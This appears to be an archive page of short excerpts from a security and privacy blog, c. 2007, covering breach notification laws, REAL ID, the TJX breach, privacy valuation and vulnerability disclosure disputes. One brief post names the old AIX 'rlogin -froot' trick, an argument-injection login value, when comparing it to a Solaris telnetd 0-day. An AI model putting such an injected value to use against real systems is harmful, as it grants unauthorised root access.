Last Friday, Amrit again said that no wars are won through awareness and although he repeatedly claims that he’s not against user awareness training, he doesn’t really tell us where he thinks it should fit in. Instead he shows his bias as a former product manager and Gartner analyst and focuses purely on tools by […]

 

Attacking Metrics

Last week I had the pleasure of having lunch with Alex Hutton from RMI and we got to talking about metrics. Specifically, we talked about how most metrics that we security folks come up with are well boring are effectively useless to upper management. At best they are focused on technical management such as the […]

 

One Company Gets The Privacy Thing

I currently love my mortgage company. Those that know me in real life, know that I recently bought a house. Yesterday, I received a privacy notice in the mail from them. I figured it was the standard template that everyone uses saying that if I didn’t want my information shared, I should call them up/email […]

 

The 'Gay Marriage' of Computer Security?

Reading Dale Carpenter’s post on Volokh,”Big win for SSM in Massachusetts,” I was struck by how similar his narrative is to my thinking around breach notice. He writes (and I emphasize): What’s so striking about the vote today is how dramatically support for SSM has grown in the legislature (and in state public opinion polls) […]

 

Flower Power Sucks

Having the unfortunate luck to be in National Public Radio’s target demographic, I occasionally wind up hearing stories that clearly are pandering to what I will with all due sarcasm refer to as “my generation”. Actually, I’m in the one after that, but I recognize the pandering. Lately, not just on NPR but on my […]

 

New Hampshire, North Carolina overlap

New Hampshire’s requirement to clue in the AG’s office or your primary regulator took effect 1/31/2007. I have info from NH and NC (but not NY, yet) covering the period since 1/17, so we can see how much overlap there is: NewHampshire NorthCarolina New Hampshire 40 11 North Carolina 11 41 I am eager to […]

 

Disclosures where they're not required by law

It’s the new normal in the English speaking world. See: “Hard drive stolen from Concordia” hospital in Winnipeg. The Bank of Scotland lost a DVD or DC in the mail, “Bank loses details on 62,000 customers in post.” “Personal banking info goes missing” regarding 120,000 Coastal Community Credit Union in Nanaimo, British Columbia. “Personal information […]

 

Emergent Downtime

We had some downtime after a failure at our hosting facility. We would like to address the power loss which occurred in our Virginia Datacenter on Wednesday, June 13th. We are still investigating the root cause, but in the interest of full disclosure, here are the facts as we know them today. A more complete […]

 

Global Biometrics Database, Coming to Soon to You

Raiders News Network quotes an Interpol press release, “G8 Give Green Light For Global Biometric Database:” MUNICH, Germany – G8 Justice and Interior Ministers today endorsed a range of vital policing tools proposed by Interpol Secretary General Ronald K. Noble aimed at enhancing global security. Secretary General Noble exposed the global problem of prison escapes […]

 

Fascinating breach detail: Illinois Department of Financial and Professional Regulation

Here’s detail from a InformationWeek story, “Hackers Blamed For Data Breach That Compromised 300,000:” A hacker broke into the computer network at the Illinois Department of Financial and Professional Regulation this past January and accessed a server that held information on about 1,200,000 people who have licenses or applied for licenses with the department. Susan […]

 

Laurie, Cameron and Brands (Oh My!)

There’s a fascinating exchange going on between Ben Laurie, Kim Cameron, and Stefan Brands. This is utterly fascinating if you have any interest at all in online identity, but haven’t had the time to compare systems. I’d try to contribute, but I’ve been in the midst of a large project at work. Archival links: Stefan: […]

 

Wanted: iPod organ donor.

I’m not throwing out a whole iPod just because the headphone jack is hosed. If you have a dead mini iPod (maybe with a smashed display, say?), and you don’t want to take up precious landfill space, leave a comment or send me an email.

 

I don't know much about art…

…but encasing a skull in millions of bucks worth of diamonds and thinking you’ve made some kind of statement strikes me as uninspired in the extreme. Of course, this matters not, because this is “the work with the highest intrinsic value in modern and contemporary art” according to a guy who works for an insurance […]

 

"An Empirical Approach to Understanding Privacy Valuation"

Luc Wathieu and Allan Friedman have an article in Harvard Business School’s ‘working knowledge,’ titled “An Empirical Approach to Understanding Privacy Valuation.” In it, they present the results of a survey of 647 people with regard to a number of privacy hypotheses. Their results include: Contrary to some research, the chief privacy concern appears based […]

 

Failure of Imagination

USA Today tells us, “Sci-fi writers join war on terror,” in which, “the Homeland Security Department [sic] is tapping into the wild imaginations of a group of self-described “deviant” thinkers….” There are many available cheap shots as well as fish to shoot in that barrel. I’m going to take a cheap shot at one not […]

 

Venn and the art of empirical breach research

As EC readers may recall, I have made various Freedom of Information requests to state governments in order to obtain data regarding breaches reported to them under their various notification laws. This week, I received responses to the latest request I made to New York and North Carolina. New York has 822 pages to send […]

 

Ministry of Truth in Advertising

The BBC reports that “Ministers set out plan for waste.”…Usually, they at least claim they’re spending our money wisely.

 

Overwhelmed or Under-notified: Consumers and Breach Notices

In asking why customers don’t leave after a breach, there are two theories that people have put forth that are interestingly contradictory. the first is that they don’t know about the breaches. This was suggested by a questioner at Toorcon Seattle. The second is that customers are overwhelmed with notices. This is popular amongst bankers, […]

 

Marco Pierre White on Intellectual Property

This via Salon’s “The man who made Gordon Ramsay cry” — and let’s face it, making Gordon Ramsay cry is a great place to start. Alex Koppelman asks: …. Do you think a chef’s recipes should be protected as intellectual property? White replies: You can’t reinvent the wheel. Everyone takes from everybody. How many people […]

 

TSA on PBJ: No way

United States congressman Tim Ryan is interested in bringing attention to the meager allotment the U.S. food stamp program provides. This program, for those who don’t know, provides what amounts to scrip which can be used for qualified food purchases to persons who meet a certain needs test. The average food stamp recipient receives $21.00 […]

 

Premature optimization is the root of all evil

The observation is no less true of legislation than it is of code.
Case in point is the debate over whether to trigger breach notifications when a “reasonable” risk of harm or a “significant” risk of harm exists. Everybody is quick to cite California’s breach law, so I’m going to cite New York’s:

 

75% of Britons Want to Know

The European Commission has done an “E-Communications Household Survey,” and found that overwhelmingly, “UK internet users want to be informed of data losses:” Most UK residents want to be informed if their personal data is lost or stolen after a corporate security breach, the latest E-Communications Household Survey from the European Commission (EC) has revealed. […]

 

Reading, Writing, and Arithmetic

I’ve been encountering some really silly software lately. I was trying to visit the homeland stupidity blog, with Safari and the most-excellent pithhelmet, and I get this message: We’re sorry, but we could not fulfill your request for /2007/04/21/astroglide-data-breach-exposes-customer-information/ on this server. An invalid request was received from your browser. This may be caused by […]

 

Shock Horror! Ashcroft Am Not Devil Incarnate!

In 27 B Stroke 6 Threat Level, Kevin Poulsen writes, “News from Bizzaro World: Ashcroft Opposed Taps.” Kevin, your reality tunnel is showing. There are many things that Ashcroft was (I apologize for using the past tense), starting with prig and prude. I’m not particularly a fan of his, but the Venn diagram of what […]

 

On Illegal Wiretaps

What, indeed, was the nature of the “program” before Goldsmith, Comey and Ashcroft — those notorious civil libertarian extremists — called a halt to it, and threatened to resign if the President continued to break the law? And what was the nature and breadth of its legal justification? I am hardly alone in realizing that […]

 

893 Million, and Whadda Ya Get?

♫Another DHS network, and we’re not sharing yet.♫ So reports Haft of the Spear, in “You’ll Share and You’ll Like It!” The Homeland Security and Justice departments have spent $893 million on information-sharing networks in the last two years but still do not have effective networks in place, according to a report from the Government […]

 

Animations of US Flight Patterns

Aaron Koblin of UCLA has an amazing website of animations he’s done using FAA flight data. It’s well worth a look.

 

What, me worry?

TJX sales up, again. Via StorefrontBacktalk: …TJX reported Thursday that its April sales increased another 2 percent, to $1.28 billion…. More importantly, for the thirteen weeks ended May 5, 2007, sales reached $4.2 billion, a 7 percent increase over last year’s $3.9 billion.

 

Disclosure in The UK

Scotsman.com reports “Standard Life customers are hit by breach in security,” and Computerworld.uk reports that a “Laptop containing Southend children’s social services case notes bought on eBay.” In the US, neither of these would even be news. They’re both small, first time mistakes. Both would probably require notice under state law. However, it’s anarchy in […]

 

Facebook Hangover

On Dave Farber’s list, Brock Meeks pointed us to a delightful Facebook Smackdown. Brock says, What do Facebook, the CIA and your magazine subscription list have in common? Maybe more than you think… http://www.albumoftheday.com/facebook/ Trust me, it’s worth the look. And indeed it is worth looking at, along with Patrick Schitt’s contribution of the background […]

 

Interesting Stuff From Microsoft

My colleague Dave Ladd has a post “Security Education v. Security Training:” Unfortunately, there’s an assumption held by many in our (IT) community that the road to better security leads to “drinking from the fire hose” – that is to say, employees are rocketed through week long training classes, then drilled and tested on security […]

 

Encryption Is Security Theater

Last night I was talking with a certain analyst from a large company that we’ve all heard from and we got into a discussion about most security people not understanding encryption at all, to the point that it is assumed to be a cure-all. In fact, with the exception of encrypting data at rest (and […]

 

"The vendor made me do it"?

Via StorefrontBacktalk comes news that Following lawsuits in February against some of the nation’s largest retailers for illegally revealing too much credit card information on printed receipts, two of those retailers are now suing their POS vendors. In the last couple of weeks, two of those retail defendants—Charlotte Russe and Shoe Pavillion—have sued their POS […]

 

DHS Sends a Flunky to Do A Man's Job

So DHS has managed to cancel all but one “Town Hall Meeting” about REAL ID. They’re sending a “Richard Barth, Assistant Secretary, Office of Policy Development” to talk to the fine people of San Francisco about the travesty of a national ID card which is REAL ID. We’ll waste $20 billion dollars on this nonsense, […]

 

A Market To Be Tapped

I’ve often talked about how people will pay for privacy when they understand the threat. In that light, the New York Times article “Phone Taps in Italy Spur Rush Toward Encryption” is fascinating: Drumming up business would seem to be an easy task for those who sell encrypted cellphones in Italy. All they have to […]

 

WOOT! Looks Exciting

Via Nate, “WOOT = Usenix + Blackhat:” The call for papers is now up for a new Usenix workshop, WOOT (Workshop On Offensive Technologies, but don’t think the name came before the acronym.) The workshop will be co-hosted with Usenix Security and will focus on new practical attacks. I was recently saying that vulnerability research […]

 

Announcing…The Security Development Lifecycle Blog

My team at work announced the launch of “The Security Development Lifecycle” blog today. After the intro post, Michael Howard leads off with “Lessons Learned from the Animated Cursor Security Bug.” I’m pretty excited. We’re focused on transparency around what we’re learning as we continue to develop the SDL.

 

Security Through Stupidity

In my last post on security, I promised a tale, and I ought to deliver on that before it becomes nothing more than a good intention. Some time ago, so long ago that it no longer matters, I bought a piece of network stereo equipment. It was one of these little boxes that lets you […]

 

Gartner Discovers Offshoring

According to CIO Forum, Gartner has discovered some amazing things. There’s offshoring to India, and it’s growing at a “staggering” 16% per year. And lots of manufacturing is being done in China now. And the US better wake up ASAP because it is “in imminent danger of becoming an industry of failure.” This is a […]

 

One Third of McAfee Survey Respondents Are Not Paying Attention

So reports Sharon Gaudin in Information Week. Actually, I think she picked up the story as McAfee spun it: “Companies Say Security Breach Could Destroy Their Business:” One-third of companies said in a recent poll that a major security breach could put their company out of business, according to a report from McAfee. The security […]

 

Save Chocolate

“Don’t Mess With Our Chocolate,” says Guittard. Summary: the FDA is considering changing the definitions of “chocolate” and “chocolate flavored” and “chocolaty” so that they don’t have to put as much cocoa solids in it to make it be “chocolate.” The FDA is soliciting comments, and the cutoff is April 25, so that’s not much […]

 

When Do Customers Flee?

So I’ve long thought that consumers treat breaches as mistakes, and generally don’t care. In reading the Ponemon reports, it seems that the average customer churn is 2%. (I’ll come back to that number.) But it gets worse when you have repeated breaches. In the CSO blog, “What, When and How to Respond to a […]

 
 

Disclosure, Discretion and Statistics

One of the very interesting things about mandatory disclosure of breaches is that it adds a layer of legitimacy to the data. If all we have are self-selected reporters, we must investigate what bias that adds. This makes the FBI-CSI report and many others even less useful. New laws that require disclosure give us not […]

 

On Liquid Explosives

Wired’s Danger Room blog has an interesting quote from the inventor of a liquid explosive in “‘Liquid Landmine,’ Qaeda Tool?:” My advice would be to stick with PETN [a high explosive] and rattlesnakes.

 

"What security people won't share with each other"

Scott Blake has a really interesting 3-part podcast interview with Mike Murray. See Mike’s post, “it never ceases to amaze me what security people won’t share with each other,” and go understand why you should give Scott a demerit. (I’d meant to post this months ago, when Scott did the interview. Oops!)

 

Users force Dell to resurrect XP

The Beeb reports. This means that if you want to start speculating in copies of XP, you probably have even longer to wait.

 

Weak Crypto Contest

The 2007 Underhanded C Contest has a marvelous theme — weak crypto. The object of this year’s contest: write a short, simple C program that encrypts/decrypts a file, given a password on the command line. Don’t implement your own cipher, but use a bog-standard strong cipher from a widely available library. […] Your challenge: write […]

 

Credentica White Paper & Presentation

The title of Stefan Brands’ blog post, “New Credentica white paper and other materials,” pretty much says it all. If you think about identity management, you should go check these out. Our white paper discusses all of the features of the U-Prove SDK without going into technical detail. The basic features are: transient ID Tokens; […]

 

Frontiers of Data Disclosure

Howard Schmidt made a glib suggestion that made me laugh, but he has a point. He asked why don’t we just take names, social security numbers, and everyone’s mother’s maiden name and put it in a huge searchable database, so everyone knows that it’s not security information and we can once and for all stop […]

 

Micropayments Company Bought or is that Sold?

Micropayments company Peppercoin, started with technology by Rivest and Shamir has been bought by Chockstone, a company doing loyalty programs. Supposedly, they bought Peppercoin because it will “increase consumer ‘stickiness’ and brand affinity” and “increase average ticket price more than 12%.” Okay…. I thought that the reason for bearer-level micropayments was the opposite. Right here […]

 

Psychology & Security & Breaches (Oh My!?)

I’ve been talking about disclosure, and how it has the potential to change the way we work. Before it does that, it needs to change the way we think. Change is hard. There’s a decent argument that many things are the way they are because they’ve emerged that way. There existed a froth of competing […]

 

Bejtlich gets it: It's about empiricism

When he mentioned my post he cited a new paper titled A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006 by Phil Howard and Kris Erickson. Adam highlighted this excerpt 60 percent of the incidents involved organizational mismanagement as a way to question my assertion that insiders […]

 

Bad Advice on Tax Shelter Patents

Techdirt carries marvelous coverage of the increasing devolution of our intellectual property system. However there is some bad advice in “Be Careful Not To Use Any Patented Tax Shelters This Tax Season.” The bad advice is in the last sentence: So as we get to tax day, besides going over all your tax forms and […]

 

Investment Opportunity of the Year

El Reg reports that Microsoft claims to be sticking to its timetable for shutting down XP. No fewer than three people told me yesterday, “This means I have to buy that Mac Book Pro this year. They can’t be alone. I have several co-workers running Vista running on laptops, and even without the overhead of […]

 

From The "Wish I'd Posted That" Files

Gunnar (as usual) has a great post highlighting the lack of a real cohesive strategy in the security products arena and IT security teams losing site of the big picture. In particular, he highlights a comment from Andrew van der Stock about using SMS as an out of band authentication mechanism. Man I wish I’d […]

 
 

UK Story On Breaches and Silence

IT Week in the UK writes, “Companies keep silent on data breaches.” There are a couple of interesting quotes: Jonathan Coad, a media specialist at law firm Swan Turton, said newsworthy breaches are often leaked to the press. “Reporting crime to the police is a double-edged sword as invariably the press has found out about […]

 

Disclosure Laws, State-by-State

Philip Alexander writes in Intelligent Enterprise about “Data Breach Notification Laws: A State-by-State Perspective.” The article is short and readable, and points to his new book, which is likely a good read.

 

See, it can be done

I’ll keep this short since you should all be reading Mordaxus’ latest, not this, but speaking of data… This breach report [pdf] from Community National Bank wasn’t sent to consumers, but you can’t say it was short on details.

 

Three on Information Sharing

The New York Times has a story, “Teaching the Police to Stay a Step Ahead of Car Theft:” The police have traditionally kept such conversations quiet, fearing they could tip off aspiring thieves. Mr. Bender’s mission is to bring investigators into the digital age and get them to share information, just as their adversaries are […]

 

We Have Nothing to Fear But Fear Itself

So Ken Belva suggests that we should cordially agree to disagree. (“My Response to Adam Shostack’s Reply on Transparency & Breaches“) I’m happy to be cordial, but I feel compelled to comment on his response. Before I do, I should be clear that I have respect for Ken as a professional, and as someone willing […]

 

Another Side Of Copyright

These days when you read an article about copyright that involves students, it also involves the RIAA or the MPAA. This article in the Chronicle of Higher Education, on the other hand, is about two high-school students taking on Turnitin. The students specifically asked that certain papers of theirs not be included in Turnitin’s database […]

 

UK NHS & Disclosure: A Moral Imperative Example

From Silicon.com, “Pressure grows for UK data loss disclosure:” As a spokeswoman for the Information Commissioner’s Office told silicon.com last year: “There is nothing in the Data Protection Act that legally obliges companies to inform customers when these things occur.” But, from the BBC, “Children’s details taken in theft:” Health bosses in Nottinghamshire have issued […]

 

Stop REAL-ID From Wasting Real Money and Liberty

Welcome to the Stop Real ID Now blog. Not surprisingly, we’ll be talking a lot here about the Real ID Act of 2005… and more specifically about an activism campaign that will use the power of blogs, social networks and art as well as creating partnerships and using media outreach to, we hope, stop the […]

 

TJX Commentary

I keep trying to avoid commenting on TJX, and keep getting drawn back in. The amount of news and analysis out there is large, and I’m selecting islands in the clickstream. (Any advice on who’s covering it well would be appreciated.) In “TJX Lawsuits — 45 Million Credit Cards,” Pete Lindstrom mentions that there are […]

 

Secure Flight @ Home

Prof. R. H. Anssen of the Univeristy of Florence, Colorado working under a Department of Homeland Security Advanced Research Projects grant has released a new paper discussing improvements to SecureFlight that make it much more scalable, while adding in grid-computing and privacy-friendly aspects as well. Expanding upon the ideas of K. P. Hilby and J. […]

 

On Anonymity

So Mike Rothman thinks that anonymity is for cowards: During the discussion last night, one guy pointed out that sometimes things are too sensitive or controversial or unpopular to say, so anonymity allows folks to do that. I call bullshit on that. Anonymity is the tool of a coward. And while I agree with Mike […]

 

Portuguese Got to Australia in 1522

Portuguese seafarer Christopher de Mendonca led a fleet of four ships into Botany Bay in 1522. No one noticed before because the map was oriented wrong when it was copied. This is a nice article from news.com.au.

 

Breaches and Brand Damage

Tim Erlin runs some numbers in “Is Brand Damage a Myth” at Ncircle, and Nick Owen piles follows on with some diplomatically presented thoughts in “Brand Damage, Stock Price and Cockroaches:” My theory is that information security breaches are an indicator of a lack of management competence. Moreover, as discussed previously, information security breaches are […]

 

Privacy's Other Path

Dan Solove writes: Professor Neil Richards (Washington University School of Law) and I have posted on SSRN our new article, Privacy’s Other Path: Recovering the Law of Confidentiality, 96 Georgetown Law Journal __ (forthcoming 2007). The article engages in an historical and comparative discussion of American and English privacy law, a topic that has been […]

 

A Different X-Box Hack

Back in the day, I was a member of FIRST. (Btw, rumor has it Chris and Adam are presenting at their annual conference this summer). At the time, one of the more prolific posters to the mailing list was Robert Hensing from Microsoft (Adam, if you haven’t met Rob, you should look him up). Anyways, […]

 

DoS == Vulnerability?

I think that a Denial of Service condition is a vulnerability, but lots of other people don’t. Last week Dave G. over at Matasano posted a seemingly very simple explanation that nicely sums up the way I’d always been taught to think about these sorts of issues: The ability to halt or shutdown most modern […]

 

Off to Shmoocon!

Where I’ll be explaining that “Security Breaches are good for you.” Come see me speak at 5 PM on Friday. It’ll be … entertaining.

 

Why BitLocker Won't Help Most Companies

A couple of weeks ago, Mike Rothman linked to an article by George Ou about using EFS and BitLocker under Vista. There he made an extraordinary claim: Since BitLocker won’t encrypt additional hard drive volumes, whether they’re logical partitions on the same physical disk or additional disks, you must use EFS to encrypt those volumes […]

 

Ptacek scores, Pre-Blogging Department with the assist!

Matasano’s Thomas Ptacek had a Groucho-like reaction to being included as a “Top 59” infosec influencer in ITSecurity.com’s recent list. EC’s Pre-Blogging Department was initially caught flat-footed on this, but predicted in an update that Tom’s view would gain traction. And it has. Meanwhile, Mark Curphey has stirred the pot by leaving the Security Bloggers’ […]

 

We're number 18, but we try harder…

Adam (or perhaps EC?) is one of the top 59 infosec influencers, sayeth itsecurity.com Cool. 18. Adam Shostack http://www.emergentchaos.com/ Emergent Chaos is a group blog on security, privacy, liberty and economics – a self-declared “Emergent Chaos jazz combo of the blogosphere. ” While the EC bloggers tend to drift off topic with political posts, they […]

 

Reports on Reporting, Compliance

A University of Washington researchers Kris Erickson and Philip Howard have an interesting new paper out, “A Case of Mistaken Identity? News Accounts of Hacker and Organizational Responsibility for Compromised Digital Records, 1980–2006.” This is a great survey of the dramatic explosion in reports of breaches. A couple of great quotes: One important outcome of […]

 

Ignorance is Strength

Via a Stitch in Haste, we learn about more members of the ‘sweep it under the rug’ club: David Oliver Burleson, 49, an anesthesiologist whose license was suspended for two years in October 2005 … acknowledged to the Oregon Board of Medical Examiners that he inappropriately touched women whom he had sedated before surgery. The […]

 

"Voluntary" ID Cards

Anybody who objects to their personal details going on the new “Big Brother” ID cards database will be banned from having a passport. James Hall, the official in charge of the supposedly-voluntary scheme, said the Government would allow people to opt out – but in return they must “forgo the ability” to have a travel […]

 

"ist nicht verfgbar"

So we had some random DNS trouble recently. I believe everything should be back to normal, but DNS issues can take a while to propagate and be fixed. So apologies for the non-availability. We’ve made procedural changes to make these less likely in the future. Oh, and we lost the SSNs of everyone who had […]

 

Dennis Lormel's Authoritarian Streak

In a post at the Counter-terrorism blog, “National Security Letters…An Important Investigative Tool for the FBI” Dennis Lormel writes: The Inspector General (IG), U.S. Department of Justice, has issued a report delineating audit findings identifying significant deficiencies in NSL recordkeeping and reporting processes. This determination is quite troubling and inexcusable. Troubling and inexcusable? Well, you’d […]

 

Power Tends to Corrupt

The Justice Department’s inspector general has prepared a scathing report criticizing how the F.B.I. uses a form of administrative subpoena to obtain thousands of telephone, business and financial records without prior judicial approval. The report, expected to be issued on Friday, says that the bureau lacks sufficient controls to make sure the subpoenas, which do […]

 

If It feels so wrong, how can it be so right?

Emacs users get addicted to the standard key bindings (which are also available in Cocoa apps). Microsoft Word doesn’t support these by default, but you can add them through customization. Here are the ones I find most useful: StartOfLine: Control-A EndOfLine: Control-E To set these up in Word… …you’ll have to read “Add emacs key […]

 

Responsible Disclosure and Months of Bugs

I had promised myself that I wasn’t going to post about any of the Month of Bugs projects and that everything that needed saying had been said by people far more eloquent than I. But then Michael over at MCW Research came at it from a different angle saying: I whole-heartedly back these projects as […]

 

Emerging dating paranoia

When Adam asked me to guest blog on “Dinner, Movie — and a Background Check — for Online Daters“, I promised him I would do it. And then I read the article and couldn’t think of what to say about it. I’m something of a self-proclaimed expert of internet hookups (as anyone who reads ClueChick, […]

 

DST is Coming, Run For Your Lives!

In a week, the US and Canada are changing when they go to Daylight Savings Time. It must also be a slow news time, as well, because I’ve read several articles like this, “Daylight-Saving Time Change: Bigger than Y2K?” When Y2K came around, a number of us quoted Marvin the Martian (now of the Boston […]

 

Jennifer Granick's awesome explantion

Imagine if, in the 1970s, the tobacco companies had patented devices to measure the health effects of smoking, then threatened lawsuits against anyone who researched their products. I’ve never heard such a clear explanation of why threats to security research are bad. From “Patently Bad Move Gags Critics,” in Wired. The same can be said […]

 

HIDing At Blackhat

Now HID is claiming that they did not demand that Chris or IOActive cancel their talk. As a result the talk is now back on, but with the details about the device and the demo expurgated. As Chris has repeatedly said, this attack is completely generic and works against any passive RFID tag. Additionally, Nicole […]

 

Medical Privacy News

There’s a great editorial about how your prescriptions are bought and sold all over the place, “Electronic prescribing is no panacea” by Dr. Deborah Peel, in Government Health IT. Also, Health Care IT news reports that “Federal privacy panel leader resigns, raps standards:” The leader of a federal panel charged with providing privacy recommendations for […]

 

No, seriously

Somebody — I want to say Rich Mogull, but I cannot find the reference — wrote sarcastically about breach notices almost always saying “At $COMPANY we take security seriously….” as they report how, well…you know. I just finished scanning 183 notice letters I got from New York, covering the last half of 2006. Using an […]

 

Vote Positively With Your Pocketbook

Adam Frucci at Gizmodo is calling for action, “Putting Our Money Where Our Mouths Are: Boycott the RIAA in March.” I don’t disagree with him on the basics. I believe that consumer revolt is a misunderstood power. If you don’t believe me, I can prove it with one TLA: DAT. If your response to that […]

 

Blackhat Do It Again

Looks like HID hasn’t learned anything from Cisco’s experience two years ago. One of these years more vendors will learn how to manage vulnerability disclosure and follow the lead of companies like Microsoft and Cisco rather than sticking their foot in it. Chris Paget a well respected researcher is going to present at Blackhat Federal […]

 

A telling remark

In the “inconvenient coincidences” category, it seems that Al Sharpton’s great-grandfather was a slave owned by relatives of the late segregationist US senator Strom Thurmond. Thurmond’s niece, Ellen Senter (via an AP report) provides an interesting perspective: I doubt you can find many native South Carolinians today whose family, if you traced them back far […]

 

Why We Fight

TJX appears to have suffered little financial fallout. Its stock fell just 2 percent yesterday after the company disclosed the new problems, along with its fourth-quarter earnings. For the three months ended Jan. 27, TJX said, profit fell to $205 million from $288 million in the same period a year earlier. Store closings led TJX […]

 

Wretched Word of the Week: Trust

Where to start on this one? Trust as we use it means so many things. Then there’s the word trusted. Beyond that, there is trustworthy. A bullet point on a slide I recently saw said, “Trusted computing is not trustworthy computing.” Oh, how nice. Even better, “Trusted Computing does not mean trustworthy or secure.” I […]

 

Data Collection about Breaches

In “Once a data loss report, always a data loss report?” Dissent asks about what we should be collecting and analyzing. Scenario 1: “We thought we had lost a computer with sensitive customer records, but it turns out we didn’t lose it.” Should that entry in a breach list be removed? I think that the […]

 

Award-winning scrotum

The New York Times writes about “The Higher Power of Lucky“, a children’s book which recently won the Newbery Medal. As someone who has purchased his share of kids’ books, I assure you that the Newbery — and its companion the Caldecott Medal — signal quality to buyers. In this case, though, some parents and […]

 

Visualizing Breach Data

Using IBM’s cool “Many Eyes” service (now in alpha), I played for a few minutes with some breach data. Nothing more than the size of each entry in Attrition’s database, and its date. Looks kinda cool, I think.

 

DVD Player Advice?

I’d like to buy a cheap DVD player, and bet someone reading can tell me: Who’s the Apex of 2007? That is, who’s making cheap, consumer-friendly DVD players? I’d like one that’s: region-free fully controllable (none of that “we’re sorry, you have to watch the ads” crap) good at error-correcting for scratched up DVDs.

 

Credentica Launches U-Prove

Montreal, QC (PRWEB) February 13, 2007 — Credentica , a Montreal-based provider of innovative security software for identity and access management, today announced the immediate availability of its U-Prove product for user-centric identity management. The U-Prove product enables organizations to protect identity-related information with unprecedented security throughout its lifecycle, wherever it may travel. It is […]

 

Ignite Seattle

I attended Ignite Seattle last night. It was awful. Don’t attend next time. No, just kidding. It was great, and very crowded. There were some really awesome talks. I’m inspired to put a talk together for next time. My favorites from last night were: Elisabeth Freeman gave a great talk on how the Head First […]

 

Department of pre-blogging, II

A bit of background. Sun recently got hit with a 0-day that was 13 years in the making, by seemingly repeating a coding worst practice that bit AIX back in 1994 — trusting environment variables under the control of an attacker. A slightly more complex variant bit Solaris’ telnetd in 1995. From the advisory (NSFW) […]

 

Party like it's 1994

A 0-day in Solaris {10,11} telnetd is reported. SANS has some details. Anyone who remembers the AIX “rlogin -froot” vuln will appreciate this one. (h/t to KK on this one)

 

Breach irony

According to Courtney Manzel, Counsel – Office of Privacy, Sprint Nextel Corporation, reporting a breach pursuant to NY’s notification law: A laptop computer was stolen from the human resources department of Velocita Wireless during a rash of office burglaries in the Woodbridqe, New Jersey area. The laptop computer was one of many items stolen. It […]

 

Must-Read Article: The Ecstasy of Influence

This is in Harpers, “The Ecstasy of Influence.” It is an interesting meditation on the nature of art itself and how art is composed of other art. However, not only must you read this, you must read it all the way through to understand it and why it is important.

 

Coviello: RSA 2010 Will be Last Conference

Okay, that’s not precisely what he said. What he said was that in “two to three years” there will be no more “standalone security solutions.” Meanwhile, the tradeshow floor of the RSA conference seems to be enjoying something of a renaissance, which is good to know, as the theme of the conference is, well, The […]

 

If You Blow Hard, You Can Find a Disclosure Debate

So there’s a video of how to “Unlock A Car With a Tennis Ball.” I advise turning the sound off-there’s no value to a bad pseudo-rock soundtrack, and no information in it (all the narration is in text in the video). There’s also precious little information in the video. It’s not clear what make or […]

 

I Was Wrong

I’ve had a conversation recently with a CSO about breach disclosure. His shop had screwed up and exposed, well, an awful lot of social security numbers. They feel really bad about it, and they don’t think anyone will really be hurt. Gosh darn it, he was really sincere. So I take it back. We should […]

 

Defend Traditional Marriage In Washington

The Washington Defense of Marriage Alliance seeks to defend equal marriage in this state by challenging the Washington Supreme Court’s ruling on Andersen v. King County. This decision, given in July 2006, declared that a “legitimate state interest” allows the Legislature to limit marriage to those couples able to have and raise children together. Because […]

 

Dave Molnar, Call Matt Blaze

Dave Molnar has some good comments on ‘Stolen ID Search.’ He writes, starting with a quote from “ben:” “I can’t believe you are advocating typing your ssn or credit card into a mystery box.” That’s “ben”, commenting at TechCrunch on Stolen ID Search, a service from Trusted ID that will tell you if your social […]

 

Department of Pre-blogging

Make sure to check out the blog posts Bruce Schneier and a host of others will soon make regarding the paralyzing effect that silly Blinkenlights ads for Aqua Teen Hunger Force had in Boston. The coordinated response by all departments proves the system we have in place works. Boston Mayor Thomas Menino Behold the power […]

 

Is this idea feasible?

With all the reports of lost backup tapes, I wonder if it would be technically feasible to keep an eye on them using RFID tags. If a tape “tries to leave” a facility without having been pre-authorized, bells go off. If a tape can’t be found, there’s a record of where it was last detected […]

 

Secrecy is not Privacy

So, I’m really irked by headlines like “Microsoft’s ‘Secret’ Security Summit.” First, it wasn’t Microsoft’s summit. It was an ISOTF meeting that had public web pages. Microsoft provided conference facilities and lunch. I don’t think we even bought the beer. Second, it wasn’t a secret. It has web pages: “Internet Security Operations and Intelligence II […]

 

From the "A Child Shall Lead Them" Desk

Response #24 in a discussion on FlyerTalk: My 10-y.o. son, like many kids, believes that backpacks have to be overloaded to work. Recently, at LAX T-6 (shoe carnival central), the TSA removed 2 partially full water bottles from his backpack after x-ray screening. On the return flight, at JFK T-9, they found 2 more, both […]

 

I'm Glad I'm a Beta!

27B Stroke 6 tells us of a story. The domain SecLists.org was removed from the net by GoDaddy, its registrar. Why? Because MySpace complained. He’s got a mailing list archive and it has some stuff in it that pissed MySpace off — security information about phishing attacks. That’s well and good, but GoDaddy yanked the […]

 

When a 0% Success Rate is Worthwhile

There’s an article in Zaman.com, about “Turkish Hacker Depletes 10,000 Bank Accounts ” A criminal enterprise comprised of 10 individuals who drained the accounts of 10,580 customers by sending virus-infected e-mails was busted in Istanbul. … The suspects reportedly sent virus-infected emails to 3,450,000 addresses, and subsequently drained 10,850 bank accounts. That’s a hit rate […]

 

Old-Fashioned Values

This is probably the most important minute of video you’ll see this week, but on a better week, it won’t be. Thanks to manfromlaramie for finding this.

 

Funniest Spam of the Week

Hmmm, what to do, what to do? This is so funny on so many levels. How can you not like a phishing attack where the hook is a poll based on eBay being closed because of so many phishing attacks? January 19, 2007 Dear eBay Community: We have decided to close eBay on 27 February […]

 

Two Quickies on Credit

“The spread of the credit check as civil rights issue,” in the Christian Science Monitor: Bailey, with her lawyer, has lodged a complaint against Harvard charging racial discrimination. The reason: Studies show that minorities are more likely to have bad credit, but credit problems have not been shown to negatively affect job performance. and “Insurers […]

 

Everything Old is New Again

“They are a handful of miserable resuscitators of a degenerate dead religion who wish to return to the monstrous dark delusions of the past,” said Father Efstathios Kollas, the President of Greek Clergymen. Hundreds of followers of Zeus, Hera, Poseidon, Artemis, Aphrodite and Hermes stood in a circle, a mile from the Acropolis, in what […]

 

A compromising position

Does Pete Lindstrom need to buy a dictionary? You make the call. In a recent post at Spire Security Viewpoint, he suggests that the folks at Privacyrights.org might be liars: I am starting to see (and hear) this “100 million records lost since February, 2005” figure referenced in a number of places such that it […]

 

It's Amazing What A Little Oversight Can Do

